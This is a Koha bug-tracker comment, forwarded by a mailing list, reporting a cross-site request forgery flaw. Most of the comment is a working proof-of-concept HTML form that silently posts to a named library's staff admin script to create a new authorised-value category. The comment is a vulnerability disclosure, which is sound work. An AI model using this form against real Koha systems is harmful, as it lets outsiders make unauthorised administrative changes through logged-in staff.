https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=24409

--- Comment #1 from Aman Mishra <[email protected]> ---
When we use this script it is allow to create new category
<html> 
<body> 
<script>history.pushState('', '', '/')</script> 
<form
action="http://library-staff.totalit.com/cgi-bin/koha/admin/authorised_values.pl";
method="POST">
<input type="hidden" name="category" value="AMAN8" />
<input type="hidden" name="op" value="add_category" />
<input type="hidden" name="id" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

-- 
You are receiving this mail because:
You are watching all bug changes.
You are the assignee for the bug.
_______________________________________________
Koha-bugs mailing list
[email protected]
https://lists.koha-community.org/cgi-bin/mailman/listinfo/koha-bugs
website : http://www.koha-community.org/
git : http://git.koha-community.org/
bugs : http://bugs.koha-community.org/

Reply via email to